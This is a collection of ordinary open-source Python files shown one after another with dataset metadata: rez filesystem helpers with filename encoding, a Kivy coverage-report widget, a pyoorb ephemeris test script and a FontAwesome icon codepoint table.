os.chmod(path, orig_mode)
@contextmanager
def retain_cwd():
"""Context manager that keeps cwd unchanged afterwards.
"""
cwd = os.getcwd()
try:
yield
finally:
os.chdir(cwd)
def get_existing_path(path, topmost_path=None):
"""Get the longest parent path in `path` that exists.
If `path` exists, it is returned.
Args:
path (str): Path to test
topmost_path (str): Do not test this path or above
Returns:
str: Existing path, or None if no path was found.
"""
prev_path = None
if topmost_path:
topmost_path = os.path.normpath(topmost_path)
while True:
if os.path.exists(path):
return path
path = os.path.dirname(path)
if path == prev_path:
return None
if topmost_path and os.path.normpath(path) == topmost_path:
return None
prev_path = path
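# Illustrative example (not part of the original file): on a typical POSIX system where
# /usr exists but /usr/no/such/dir does not, one would expect
# get_existing_path("/usr/no/such/dir") to return "/usr", while
# get_existing_path("/usr/no/such/dir", topmost_path="/usr") returns None, since the
# topmost path itself is excluded from the search.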
def safe_listdir(path):
"""Safe listdir.
Works in a multithread/proc scenario where dirs may be deleted at any time
"""
try:
return os.listdir(path)
except OSError as e:
if e.errno in (errno.ENOENT, errno.ENOTDIR):
return []
raise
def safe_makedirs(path):
"""Safe makedirs.
Works in a multithreaded scenario.
"""
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError:
if not os.path.exists(path):
raise
def safe_remove(path):
"""Safely remove the given file or directory.
Works in a multithreaded scenario.
"""
if not os.path.exists(path):
return
try:
if os.path.isdir(path) and not os.path.islink(path):
shutil.rmtree(path)
else:
os.remove(path)
except OSError:
if os.path.exists(path):
raise
def forceful_rmtree(path):
"""Like shutil.rmtree, but may change permissions.
Specifically, non-writable dirs within `path` can cause rmtree to fail. This
func chmod's to writable to avoid this issue, if possible.
Also handled:
* path length over 259 char (on Windows)
* unicode path
"""
if six.PY2:
path = unicode(path)
def _on_error(func, path, exc_info):
try:
if is_windows:
path = windows_long_path(path)
parent_path = os.path.dirname(path)
if not os.access(parent_path, os.W_OK):
st = os.stat(parent_path)
os.chmod(parent_path, st.st_mode | stat.S_IWUSR)
if not os.access(path, os.W_OK):
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IWUSR)
except:
# avoid confusion by ensuring original exception is reraised
pass
func(path)
shutil.rmtree(path, onerror=_on_error)
def replacing_symlink(source, link_name):
"""Create symlink that overwrites any existing target.
"""
with make_tmp_name(link_name) as tmp_link_name:
os.symlink(source, tmp_link_name)
replace_file_or_dir(link_name, tmp_link_name)
def replacing_copy(src, dest, follow_symlinks=False):
"""Perform copy that overwrites any existing target.
Will copy/copytree `src` to `dest`, and will remove `dest` if it exists,
regardless of what it is.
If `follow_symlinks` is False, symlinks are preserved, otherwise their
contents are copied.
Note that this behavior is different to `shutil.copy`, which copies src
into dest if dest is an existing dir.
"""
with make_tmp_name(dest) as tmp_dest:
if os.path.islink(src) and not follow_symlinks:
# special case - copy just a symlink
src_ = os.readlink(src)
os.symlink(src_, tmp_dest)
elif os.path.isdir(src):
# copy a dir
shutil.copytree(src, tmp_dest, symlinks=(not follow_symlinks))
else:
# copy a file
shutil.copy2(src, tmp_dest)
replace_file_or_dir(dest, tmp_dest)
def replace_file_or_dir(dest, source):
"""Replace `dest` with `source`.
Acts like an `os.rename` if `dest` does not exist. Otherwise, `dest` is
deleted and `src` is renamed to `dest`.
"""
from rez.vendor.atomicwrites import replace_atomic
if not os.path.exists(dest):
try:
os.rename(source, dest)
return
except:
if not os.path.exists(dest):
raise
try:
replace_atomic(source, dest)
return
except:
pass
with make_tmp_name(dest) as tmp_dest:
os.rename(dest, tmp_dest)
os.rename(source, dest)
def additive_copytree(src, dst, symlinks=False, ignore=None):
"""Version of `copytree` that merges into an existing directory.
"""
if not os.path.exists(dst):
os.makedirs(dst)
for item in os.listdir(src):
s = os.path.join(src, item)
d = os.path.join(dst, item)
if os.path.isdir(s):
additive_copytree(s, d, symlinks, ignore)
else:
shutil.copy2(s, d)
@contextmanager
def make_tmp_name(name):
"""Generates a tmp name for a file or dir.
This is a tempname that sits in the same dir as `name`. If it exists on
disk at context exit time, it is deleted.
"""
path, base = os.path.split(name)
# there's a reason this isn't a hidden file:
# https://github.com/nerdvegas/rez/pull/1088
#
tmp_base = "_tmp-%s-%s" % (base, uuid4().hex)
tmp_name = os.path.join(path, tmp_base)
try:
yield tmp_name
finally:
safe_remove(tmp_name)
def is_subdirectory(path_a, path_b):
"""Returns True if `path_a` is a subdirectory of `path_b`."""
path_a = os.path.realpath(path_a)
path_b = os.path.realpath(path_b)
try:
relative = os.path.relpath(path_a, path_b)
except ValueError:
# Different mounts on Windows:
# ValueError: path is on mount 'c:', start on mount 'd:'
#
return False
return not relative.startswith(os.pardir + os.sep)
def find_matching_symlink(path, source):
"""Find a symlink under `path` that points at `source`.
If source is relative, it is considered relative to `path`.
Returns:
str: Name of symlink found, or None.
"""
def to_abs(target):
if os.path.isabs(target):
return target
else:
return os.path.normpath(os.path.join(path, target))
abs_source = to_abs(source)
for name in os.listdir(path):
linkpath = os.path.join(path, name)
if os.path.islink(linkpath):
source_ = os.readlink(linkpath)
if to_abs(source_) == abs_source:
return name
return None
def copy_or_replace(src, dst):
'''try to copy with mode, and if it fails, try replacing
'''
try:
shutil.copy(src, dst)
except (OSError, IOError) as e:
# It's possible that the file existed, but was owned by someone
# else - in that situation, shutil.copy might then fail when it
# tries to copy perms.
# However, it's possible that we have write perms to the dir -
# in which case, we can just delete and replace
import errno
if e.errno == errno.EPERM:
import tempfile
# try copying into a temporary location beside the old
# file - if we have perms to do that, we should have perms
# to then delete the old file, and move the new one into
# place
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
dst_dir, dst_name = os.path.split(dst)
dst_temp = tempfile.mktemp(prefix=dst_name + '.', dir=dst_dir)
shutil.copy(src, dst_temp)
if not os.path.isfile(dst_temp):
raise RuntimeError(
"shutil.copy completed successfully, but path"
" '%s' still did not exist" % dst_temp)
os.remove(dst)
shutil.move(dst_temp, dst)
def copytree(src, dst, symlinks=False, ignore=None, hardlinks=False):
'''copytree that supports hard-linking
'''
names = os.listdir(src)
if ignore is not None:
ignored_names = ignore(src, names)
else:
ignored_names = set()
if hardlinks:
def copy(srcname, dstname):
try:
# try hard-linking first
os.link(srcname, dstname)
except OSError:
shutil.copy2(srcname, dstname)
else:
copy = shutil.copy2
if not os.path.isdir(dst):
os.makedirs(dst)
errors = []
for name in names:
if name in ignored_names:
continue
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if symlinks and os.path.islink(srcname):
linkto = os.readlink(srcname)
os.symlink(linkto, dstname)
elif os.path.isdir(srcname):
copytree(srcname, dstname, symlinks, ignore)
else:
copy(srcname, dstname)
# XXX What about devices, sockets etc.?
except (IOError, os.error) as why:
errors.append((srcname, dstname, str(why)))
# catch the Error from the recursive copytree so that we can
# continue with other files
except shutil.Error as err:
errors.extend(err.args[0])
try:
shutil.copystat(src, dst)
except shutil.WindowsError:
# can't copy file access times on Windows
pass
except OSError as why:
errors.extend((src, dst, str(why)))
if errors:
raise shutil.Error(errors)
def movetree(src, dst):
"""Attempts a move, and falls back to a copy+delete if this fails
"""
try:
shutil.move(src, dst)
except:
copytree(src, dst, symlinks=True, hardlinks=True)
shutil.rmtree(src)
def safe_chmod(path, mode):
"""Set the permissions mode on path, but only if it differs from the current mode.
"""
if stat.S_IMODE(os.stat(path).st_mode) != mode:
os.chmod(path, mode)
def to_nativepath(path):
path = path.replace('\\', '/')
return os.path.join(*path.split('/'))
def to_ntpath(path):
return ntpath.sep.join(path.split(posixpath.sep))
def to_posixpath(path):
return posixpath.sep.join(path.split(ntpath.sep))
def canonical_path(path, platform=None):
""" Resolves symlinks, and formats filepath.
Resolves symlinks, lowercases if filesystem is case-insensitive,
formats filepath using slashes appropriate for platform.
Args:
path (str): Filepath being formatted
platform (rez.utils.platform_.Platform): Indicates platform path is being
formatted for. Defaults to current platform.
Returns:
str: Provided path, formatted for platform.
"""
if platform is None:
platform = platform_
path = os.path.normpath(os.path.realpath(path))
if not platform.has_case_sensitive_filesystem:
return path.lower()
return path
def encode_filesystem_name(input_str):
"""Encodes an arbitrary unicode string to a generic filesystem-compatible
non-unicode filename.
The result after encoding will only contain the standard ascii lowercase
letters (a-z), the digits (0-9), or periods, underscores, or dashes
(".", "_", or "-"). No uppercase letters will be used, for
compatibility with case-insensitive filesystems.
The rules for the encoding are:
1) Any lowercase letter, digit, period, or dash (a-z, 0-9, ., or -) is
encoded as-is.
2) Any underscore is encoded as a double-underscore ("__")
3) Any uppercase ascii letter (A-Z) is encoded as an underscore followed
by the corresponding lowercase letter (ie, "A" => "_a")
4) All other characters are encoded using their UTF-8 encoded unicode
representation, in the following format: "_NHH..., where:
a) N represents the number of bytes needed for the UTF-8 encoding,
except with N=0 for one-byte representation (the exception for N=1
is made both because it means that for "standard" ascii characters
in the range 0-127, their encoding will be _0xx, where xx is their
ascii hex code; and because it mirrors the ways UTF-8 encoding
itself works, where the number of bytes needed for the character can
be determined by counting the number of leading "1"s in the binary
representation of the character, except that if it is a 1-byte
sequence, there are 0 leading 1's).
b) HH represents the bytes of the corresponding UTF-8 encoding, in
hexadecimal (using lower-case letters)
As an example, the character "*", whose (hex) UTF-8 representation
of 2A, would be encoded as "_02a", while the "euro" symbol, which
has a UTF-8 representation of E2 82 AC, would be encoded as
"_3e282ac". (Note that, strictly speaking, the "N" part of the
encoding is redundant information, since it is essentially encoded
in the UTF-8 representation itself, but it makes the resulting
string more human-readable, and easier to decode).
As an example, the string "Foo_Bar (fun).txt" would get encoded as:
_foo___bar_020_028fun_029.txt
"""
if isinstance(input_str, six.string_types):
input_str = unicode(input_str)
elif not isinstance(input_str, unicode):
raise TypeError("input_str must be a %s" % six.string_types[0].__name__)
as_is = u'abcdefghijklmnopqrstuvwxyz0123456789.-'
uppercase = u'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
result = []
for char in input_str:
if char in as_is:
result.append(char)
elif char == u'_':
result.append('__')
elif char in uppercase:
result.append('_%s' % char.lower())
else:
utf8 = char.encode('utf8')
N = len(utf8)
if N == 1:
N = 0
HH = ''.join('%x' % ord(c) for c in utf8)
result.append('_%d%s' % (N, HH))
return ''.join(result)
_FILESYSTEM_TOKEN_RE = re.compile(r'(?P<as_is>[a-z0-9.-])|(?P<underscore>__)|_(?P<uppercase>[a-z])|_(?P<N>[0-9])')
_HEX_RE = re.compile('[0-9a-f]+$')
def decode_filesystem_name(filename):
"""Decodes a filename encoded using the rules given in encode_filesystem_name
to a unicode string.
"""
result = []
remain = filename
i = 0
while remain:
# use match, to ensure it matches from the start of the string...
match = _FILESYSTEM_TOKEN_RE.match(remain)
if not match:
raise ValueError("incorrectly encoded filesystem name %r"
" (bad index: %d - %r)" % (filename, i,
remain[:2]))
match_str = match.group(0)
match_len = len(match_str)
i += match_len
remain = remain[match_len:]
match_dict = match.groupdict()
if match_dict['as_is']:
result.append(unicode(match_str))
elif match_dict['underscore']:
result.append(u'_')
elif match_dict['uppercase']:
result.append(unicode(match_dict['uppercase'].upper()))
elif match_dict['N']:
N = int(match_dict['N'])
if N == 0:
N = 1
# hex-encoded, so need to grab 2*N chars
bytes_len = 2 * N
i += bytes_len
bytes = remain[:bytes_len]
remain = remain[bytes_len:]
# need this check to ensure that we don't end up eval'ing
# something nasty...
if not _HEX_RE.match(bytes):
raise ValueError("Bad utf8 encoding in name %r"
" (bad index: %d - %r)" % (filename, i, bytes))
bytes_repr = ''.join('\\x%s' % bytes[i:i + 2]
for i in xrange(0, bytes_len, 2))
bytes_repr = "'%s'" % bytes_repr
result.append(eval(bytes_repr).decode('utf8'))
else:
raise ValueError("Unrecognized match type in filesystem name %r"
" (bad index: %d - %r)" % (filename, i, remain[:2]))
return u''.join(result)
def test_encode_decode():
def do_test(orig, expected_encoded):
print('=' * 80)
print(orig)
encoded = encode_filesystem_name(orig)
print(encoded)
assert encoded == expected_encoded
decoded = decode_filesystem_name(encoded)
print(decoded)
assert decoded == orig
do_test("Foo_Bar (fun).txt", '_foo___bar_020_028fun_029.txt')
# u'\u20ac' == Euro symbol
do_test(u"\u20ac3 ~= $4.06", '_3e282ac3_020_07e_03d_020_0244.06')
def walk_up_dirs(path):
"""Yields absolute directories starting with the given path, and iterating
up through all its parents, until it reaches a root directory"""
prev_path = None
current_path = os.path.abspath(path)
while current_path != prev_path:
yield current_path
prev_path = current_path
current_path = os.path.dirname(prev_path)
def windows_long_path(dos_path):
"""Prefix '\\?\' for path longer than 259 char (Win32API limitation)
"""
path = os.path.abspath(dos_path)
if path.startswith("\\\\?\\"):
pass
elif path.startswith("\\\\"):
path = "\\\\?\\UNC\\" + path[2:]
else:
path = "\\\\?\\" + path
return path
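# Illustrative example (not part of the original file), assuming Windows-style absolute
# paths; the expected behaviour of windows_long_path() is:
#
#     C:\long\path             ->  \\?\C:\long\path
#     \\server\share\data      ->  \\?\UNC\server\share\data
#     \\?\C:\already\prefixed  ->  unchanged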
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
|
lgpl-3.0
| -2,403,405,377,951,893,000
| 28.677557
| 114
| 0.59441
| false
| 3.891414
| false
| false
| false
|
victor-rene/kivy-test
|
gui/reportcell.py
|
1
|
1576
|
from kivy.graphics import Color, Rectangle
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.widget import Widget
class ReportCell(BoxLayout):
def __init__(self, **kw):
super(ReportCell, self).__init__(**kw)
self.data = kw['data']
with self.canvas.before:
a = .5
b = .3
Color(b, a, b, 1.)
self.rect_run = Rectangle()
Color(a, b, b, 1.)
self.rect_miss = Rectangle()
Color(b, b, a, 1.)
self.rect_excl = Rectangle()
lbl = Label(size_hint=(1, 1))
lbl.text = '%s %s (%s/%s)' % (self.data[0], self.data[3], self.data[1],
self.data[2])
self.add_widget(lbl)
self.bind(pos=self._update_rect, size=self._update_rect)
def _update_rect(self, *args):
h = self.height
w = self.width
if float(self.data[1]) == 0.:
return
run_pct = (float(self.data[1]) - float(self.data[2])) / float(self.data[1])
miss_pct = float(self.data[2]) / float(self.data[1])
excl_pct = 1. - run_pct - miss_pct
# print run_pct, miss_pct, excl_pct
self.rect_run.pos = self.pos
self.rect_run.size = w * run_pct, h
self.rect_miss.pos = self.rect_run.pos[0] + self.rect_run.size[0], self.rect_run.pos[1]
self.rect_miss.size = w * miss_pct, h
self.rect_excl.pos = self.rect_miss.pos[0] + self.rect_miss.size[0], self.rect_miss.pos[1]
self.rect_excl.size = w * excl_pct, h
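# Illustrative worked example (not part of the original file): with a made-up data
# tuple ('module', 100, 20, 'name'), presumably 100 statements of which 20 were missed,
# _update_rect computes run_pct = (100 - 20) / 100 = 0.8, miss_pct = 20 / 100 = 0.2 and
# excl_pct = 1 - 0.8 - 0.2 = 0.0, so the greenish bar covers 80% of the cell width, the
# reddish bar 20% and the bluish bar nothing.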
|
mit
| -8,431,501,857,110,692,000
| 36.547619
| 98
| 0.541244
| false
| 3.084149
| false
| false
| false
|
EUPSForge/oorb
|
python/test_2.py
|
1
|
4840
|
import os
import subprocess
import numpy as np
import matplotlib.pyplot as plt
from itertools import repeat
import pandas as pd
import pyoorb as oo
import time
def dtime(time_prev):
return (time.time() - time_prev, time.time())
def pack_oorbArray(orbits):
"""Translate orbital element dictionary (easy for humans) into pyoorb-suitable input orbit array."""
# Translate orbital elements into array that pyoorb will like.
# PyOrb wants ::
# 0: orbitId
# 1 - 6: orbital elements, using radians for angles
# 7: element type code, where 2 = cometary - means timescale is TT, too
# 8: epoch
# 9: timescale for the epoch; 1= MJD_UTC, 2=UT1, 3=TT, 4=TAI
# 10: magHv
# 11: G
elem_type = np.zeros(len(orbits)) + 2
epoch_type = np.zeros(len(orbits)) + 3
gval = np.zeros(len(orbits)) + 0.15
# Also, the orbitID has to be a float, rather than a string, so substitute if needed.
if ((isinstance(orbits['objid'][0], float) == True) |
(isinstance(orbits['objid'][0], int) == True)):
orbids = orbits['objid']
else:
orbids = np.arange(0, len(orbits['objid']), 1)
# Convert to format for pyoorb, INCLUDING converting inclination, node, argperi to RADIANS
oorbArray = np.column_stack((orbids, orbits['q'], orbits['e'], np.radians(orbits['i']),
np.radians(orbits['node']), np.radians(orbits['argperi']),
orbits['t_p'], elem_type, orbits['t_0'], epoch_type, orbits['H'], gval))
return oorbArray
if __name__ == "__main__":
t = time.time()
print "starting..."
# check against OpenOrb command line
timespan = 1000
timestep = 10
command = "/bin/rm test_out ; oorb --code=807 --task=ephemeris --orb-in=test_orbits.des --timespan=%d --step=%d > test_out" %(timespan, timestep)
print command
subprocess.call(command, shell=True)
dt, t = dtime(t)
print "Calculating ephemerides by command line took %f s "%(dt)
# Read the command line version back, to look for differences.
data = pd.read_table('test_out', sep="\s*", engine='python')
dt, t = dtime(t)
print "Reading data back from file %f s" %(dt)
print "Read %d ephemerides" %(len(data['RA']))
ctimes = data['MJD_UTC/UT1'][data['#Designation'] == 1]
print "Created %d unique times; %d times total" %(len(np.unique(data['MJD_UTC/UT1'])), len(ctimes))
# Read the orbits from disk.
dt, t = dtime(t)
orbits = pd.read_table('test_orbits.des', sep='\s*', engine='python')
newcols = orbits.columns.values
newcols[0] = 'objid'
orbits.columns = newcols
dt, t = dtime(t)
print "Reading %d orbits required %f s" %(len(orbits['q']), dt)
# convert orbit array to 'packed' form needed in oorb.
oorbArray = pack_oorbArray(orbits)
# set up oorb.
ephfile = os.path.join(os.getenv('OORB_DATA'), 'de430.dat')
oo.pyoorb.oorb_init(ephemeris_fname=ephfile)
# set observatory code
obscode = 807
# Set up dates to predict ephemerides.
timestart = orbits['t_0'][0]
times = np.arange(timestart, timestart + timespan + timestep/2.0, timestep)
times = np.array(ctimes)
# For pyoorb, we need to tag times with timescales;
# 1= MJD_UTC, 2=UT1, 3=TT, 4=TAI
ephTimes = np.array(zip(times, repeat(1, len(times))), dtype='double')
print times
dt, t = dtime(t)
print "Ready for ephemeris generation .. %f s" %(dt)
# Generate ephemerides.
oorbephs, err = oo.pyoorb.oorb_ephemeris(in_orbits = oorbArray, in_obscode=obscode, in_date_ephems=ephTimes)
dt, t = dtime(t)
print "Calculating ephemerides by python required %f s" %(dt)
# Returned ephems contain a 3-D Fortran array of ephemerides, the axes are:
# [objid][time][ephemeris information element]
# the ephemeris information elements are (in order):
# distance, ra, dec, mag, ephem mjd, ephem mjd timescale, dradt(sky), ddecdt(sky)
# per object, per date, 8 elements (array shape is OBJ(s)/DATE(s)/VALUES)
# Note that ra/dec, dradt, etc. are all in DEGREES.
# First: (to arrange ephems for easier later use)
# Swap the order of the axes: DATE / Objs / values
# Unpack ephemerides.
times = np.ravel(oorbephs.swapaxes(0, 1).swapaxes(0, 2)[4])
ra = np.ravel(oorbephs.swapaxes(0, 1).swapaxes(0, 2)[1])
dec = np.ravel(oorbephs.swapaxes(0, 1).swapaxes(0, 2)[2])
radiff = data['RA'] - ra
decdiff = data['Dec'] - dec
radiff *= 3600
decdiff *= 3600
print "min/max ra offsets", radiff.min(), radiff.max()
print "min/max dec offsets", decdiff.min(), decdiff.max()
plt.figure()
plt.plot(radiff, decdiff, 'k.')
plt.xlabel('Difference in RA (arcsec)')
plt.ylabel('Difference in Dec (arcsec)')
#plt.show()
|
gpl-3.0
| 2,614,545,079,291,372,500
| 37.412698
| 149
| 0.633884
| false
| 2.980296
| false
| false
| false
|
diegomvh/pyqt
|
widgets/glyph/codepoints/fontawesome.py
|
1
|
15278
|
#!/usr/bin/env python
import sys
if sys.version_info[0] == 3:
unichr = chr
#A list of all icon-names with the codepoint (unicode-value) on the right
#You can use the names on the page http://fortawesome.github.io/Font-Awesome/design.html
_codepoints = [
("fa-adjust", 0xf042),
("fa-adn", 0xf170),
("fa-align-center", 0xf037),
("fa-align-justify", 0xf039),
("fa-align-left", 0xf036),
("fa-align-right", 0xf038),
("fa-ambulance", 0xf0f9),
("fa-anchor", 0xf13d),
("fa-android", 0xf17b),
("fa-angle-double-down", 0xf103),
("fa-angle-double-left", 0xf100),
("fa-angle-double-right", 0xf101),
("fa-angle-double-up", 0xf102),
("fa-angle-down", 0xf107),
("fa-angle-left", 0xf104),
("fa-angle-right", 0xf105),
("fa-angle-up", 0xf106),
("fa-apple", 0xf179),
("fa-archive", 0xf187),
("fa-arrow-circle-down", 0xf0ab),
("fa-arrow-circle-left", 0xf0a8),
("fa-arrow-circle-o-down", 0xf01a),
("fa-arrow-circle-o-left", 0xf190),
("fa-arrow-circle-o-right", 0xf18e),
("fa-arrow-circle-o-up", 0xf01b),
("fa-arrow-circle-right", 0xf0a9),
("fa-arrow-circle-up", 0xf0aa),
("fa-arrow-down", 0xf063),
("fa-arrow-left", 0xf060),
("fa-arrow-right", 0xf061),
("fa-arrow-up", 0xf062),
("fa-arrows", 0xf047),
("fa-arrows-alt", 0xf0b2),
("fa-arrows-h", 0xf07e),
("fa-arrows-v", 0xf07d),
("fa-asterisk", 0xf069),
("fa-automobile", 0xf1b9),
("fa-backward", 0xf04a),
("fa-ban", 0xf05e),
("fa-bank", 0xf19c),
("fa-bar-chart-o", 0xf080),
("fa-barcode", 0xf02a),
("fa-bars", 0xf0c9),
("fa-beer", 0xf0fc),
("fa-behance", 0xf1b4),
("fa-behance-square", 0xf1b5),
("fa-bell", 0xf0f3),
("fa-bell-o", 0xf0a2),
("fa-bitbucket", 0xf171),
("fa-bitbucket-square", 0xf172),
("fa-bitcoin", 0xf15a),
("fa-bold", 0xf032),
("fa-bolt", 0xf0e7),
("fa-bomb", 0xf1e2),
("fa-book", 0xf02d),
("fa-bookmark", 0xf02e),
("fa-bookmark-o", 0xf097),
("fa-briefcase", 0xf0b1),
("fa-btc", 0xf15a),
("fa-bug", 0xf188),
("fa-building", 0xf1ad),
("fa-building-o", 0xf0f7),
("fa-bullhorn", 0xf0a1),
("fa-bullseye", 0xf140),
("fa-cab", 0xf1ba),
("fa-calendar", 0xf073),
("fa-calendar-o", 0xf133),
("fa-camera", 0xf030),
("fa-camera-retro", 0xf083),
("fa-car", 0xf1b9),
("fa-caret-down", 0xf0d7),
("fa-caret-left", 0xf0d9),
("fa-caret-right", 0xf0da),
("fa-caret-square-o-down", 0xf150),
("fa-caret-square-o-left", 0xf191),
("fa-caret-square-o-right", 0xf152),
("fa-caret-square-o-up", 0xf151),
("fa-caret-up", 0xf0d8),
("fa-certificate", 0xf0a3),
("fa-chain", 0xf0c1),
("fa-chain-broken", 0xf127),
("fa-check", 0xf00c),
("fa-check-circle", 0xf058),
("fa-check-circle-o", 0xf05d),
("fa-check-square", 0xf14a),
("fa-check-square-o", 0xf046),
("fa-chevron-circle-down", 0xf13a),
("fa-chevron-circle-left", 0xf137),
("fa-chevron-circle-right", 0xf138),
("fa-chevron-circle-up", 0xf139),
("fa-chevron-down", 0xf078),
("fa-chevron-left", 0xf053),
("fa-chevron-right", 0xf054),
("fa-chevron-up", 0xf077),
("fa-child", 0xf1ae),
("fa-circle", 0xf111),
("fa-circle-o", 0xf10c),
("fa-circle-o-notch", 0xf1ce),
("fa-circle-thin", 0xf1db),
("fa-clipboard", 0xf0ea),
("fa-clock-o", 0xf017),
("fa-cloud", 0xf0c2),
("fa-cloud-download", 0xf0ed),
("fa-cloud-upload", 0xf0ee),
("fa-cny", 0xf157),
("fa-code", 0xf121),
("fa-code-fork", 0xf126),
("fa-codepen", 0xf1cb),
("fa-coffee", 0xf0f4),
("fa-cog", 0xf013),
("fa-cogs", 0xf085),
("fa-columns", 0xf0db),
("fa-comment", 0xf075),
("fa-comment-o", 0xf0e5),
("fa-comments", 0xf086),
("fa-comments-o", 0xf0e6),
("fa-compass", 0xf14e),
("fa-compress", 0xf066),
("fa-copy", 0xf0c5),
("fa-credit-card", 0xf09d),
("fa-crop", 0xf125),
("fa-crosshairs", 0xf05b),
("fa-css3", 0xf13c),
("fa-cube", 0xf1b2),
("fa-cubes", 0xf1b3),
("fa-cut", 0xf0c4),
("fa-cutlery", 0xf0f5),
("fa-dashboard", 0xf0e4),
("fa-database", 0xf1c0),
("fa-dedent", 0xf03b),
("fa-delicious", 0xf1a5),
("fa-desktop", 0xf108),
("fa-deviantart", 0xf1bd),
("fa-digg", 0xf1a6),
("fa-dollar", 0xf155),
("fa-dot-circle-o", 0xf192),
("fa-download", 0xf019),
("fa-dribbble", 0xf17d),
("fa-dropbox", 0xf16b),
("fa-drupal", 0xf1a9),
("fa-edit", 0xf044),
("fa-eject", 0xf052),
("fa-ellipsis-h", 0xf141),
("fa-ellipsis-v", 0xf142),
("fa-empire", 0xf1d1),
("fa-envelope", 0xf0e0),
("fa-envelope-o", 0xf003),
("fa-envelope-square", 0xf199),
("fa-eraser", 0xf12d),
("fa-eur", 0xf153),
("fa-euro", 0xf153),
("fa-exchange", 0xf0ec),
("fa-exclamation", 0xf12a),
("fa-exclamation-circle", 0xf06a),
("fa-exclamation-triangle", 0xf071),
("fa-expand", 0xf065),
("fa-external-link", 0xf08e),
("fa-external-link-square", 0xf14c),
("fa-eye", 0xf06e),
("fa-eye-slash", 0xf070),
("fa-facebook", 0xf09a),
("fa-facebook-square", 0xf082),
("fa-fast-backward", 0xf049),
("fa-fast-forward", 0xf050),
("fa-fax", 0xf1ac),
("fa-female", 0xf182),
("fa-fighter-jet", 0xf0fb),
("fa-file", 0xf15b),
("fa-file-archive-o", 0xf1c6),
("fa-file-audio-o", 0xf1c7),
("fa-file-code-o", 0xf1c9),
("fa-file-excel-o", 0xf1c3),
("fa-file-image-o", 0xf1c5),
("fa-file-movie-o", 0xf1c8),
("fa-file-o", 0xf016),
("fa-file-pdf-o", 0xf1c1),
("fa-file-photo-o", 0xf1c5),
("fa-file-picture-o", 0xf1c5),
("fa-file-powerpoint-o", 0xf1c4),
("fa-file-sound-o", 0xf1c7),
("fa-file-text", 0xf15c),
("fa-file-text-o", 0xf0f6),
("fa-file-video-o", 0xf1c8),
("fa-file-word-o", 0xf1c2),
("fa-file-zip-o", 0xf1c6),
("fa-files-o", 0xf0c5),
("fa-film", 0xf008),
("fa-filter", 0xf0b0),
("fa-fire", 0xf06d),
("fa-fire-extinguisher", 0xf134),
("fa-flag", 0xf024),
("fa-flag-checkered", 0xf11e),
("fa-flag-o", 0xf11d),
("fa-flash", 0xf0e7),
("fa-flask", 0xf0c3),
("fa-flickr", 0xf16e),
("fa-floppy-o", 0xf0c7),
("fa-folder", 0xf07b),
("fa-folder-o", 0xf114),
("fa-folder-open", 0xf07c),
("fa-folder-open-o", 0xf115),
("fa-font", 0xf031),
("fa-forward", 0xf04e),
("fa-foursquare", 0xf180),
("fa-frown-o", 0xf119),
("fa-gamepad", 0xf11b),
("fa-gavel", 0xf0e3),
("fa-gbp", 0xf154),
("fa-ge", 0xf1d1),
("fa-gear", 0xf013),
("fa-gears", 0xf085),
("fa-gift", 0xf06b),
("fa-git", 0xf1d3),
("fa-git-square", 0xf1d2),
("fa-github", 0xf09b),
("fa-github-alt", 0xf113),
("fa-github-square", 0xf092),
("fa-gittip", 0xf184),
("fa-glass", 0xf000),
("fa-globe", 0xf0ac),
("fa-google", 0xf1a0),
("fa-google-plus", 0xf0d5),
("fa-google-plus-square", 0xf0d4),
("fa-graduation-cap", 0xf19d),
("fa-group", 0xf0c0),
("fa-h-square", 0xf0fd),
("fa-hacker-news", 0xf1d4),
("fa-hand-o-down", 0xf0a7),
("fa-hand-o-left", 0xf0a5),
("fa-hand-o-right", 0xf0a4),
("fa-hand-o-up", 0xf0a6),
("fa-hdd-o", 0xf0a0),
("fa-header", 0xf1dc),
("fa-headphones", 0xf025),
("fa-heart", 0xf004),
("fa-heart-o", 0xf08a),
("fa-history", 0xf1da),
("fa-home", 0xf015),
("fa-hospital-o", 0xf0f8),
("fa-html5", 0xf13b),
("fa-image", 0xf03e),
("fa-inbox", 0xf01c),
("fa-indent", 0xf03c),
("fa-info", 0xf129),
("fa-info-circle", 0xf05a),
("fa-inr", 0xf156),
("fa-instagram", 0xf16d),
("fa-institution", 0xf19c),
("fa-italic", 0xf033),
("fa-joomla", 0xf1aa),
("fa-jpy", 0xf157),
("fa-jsfiddle", 0xf1cc),
("fa-key", 0xf084),
("fa-keyboard-o", 0xf11c),
("fa-krw", 0xf159),
("fa-language", 0xf1ab),
("fa-laptop", 0xf109),
("fa-leaf", 0xf06c),
("fa-legal", 0xf0e3),
("fa-lemon-o", 0xf094),
("fa-level-down", 0xf149),
("fa-level-up", 0xf148),
("fa-life-bouy", 0xf1cd),
("fa-life-ring", 0xf1cd),
("fa-life-saver", 0xf1cd),
("fa-lightbulb-o", 0xf0eb),
("fa-link", 0xf0c1),
("fa-linkedin", 0xf0e1),
("fa-linkedin-square", 0xf08c),
("fa-linux", 0xf17c),
("fa-list", 0xf03a),
("fa-list-alt", 0xf022),
("fa-list-ol", 0xf0cb),
("fa-list-ul", 0xf0ca),
("fa-location-arrow", 0xf124),
("fa-lock", 0xf023),
("fa-long-arrow-down", 0xf175),
("fa-long-arrow-left", 0xf177),
("fa-long-arrow-right", 0xf178),
("fa-long-arrow-up", 0xf176),
("fa-magic", 0xf0d0),
("fa-magnet", 0xf076),
("fa-mail-forward", 0xf064),
("fa-mail-reply", 0xf112),
("fa-mail-reply-all", 0xf122),
("fa-male", 0xf183),
("fa-map-marker", 0xf041),
("fa-maxcdn", 0xf136),
("fa-medkit", 0xf0fa),
("fa-meh-o", 0xf11a),
("fa-microphone", 0xf130),
("fa-microphone-slash", 0xf131),
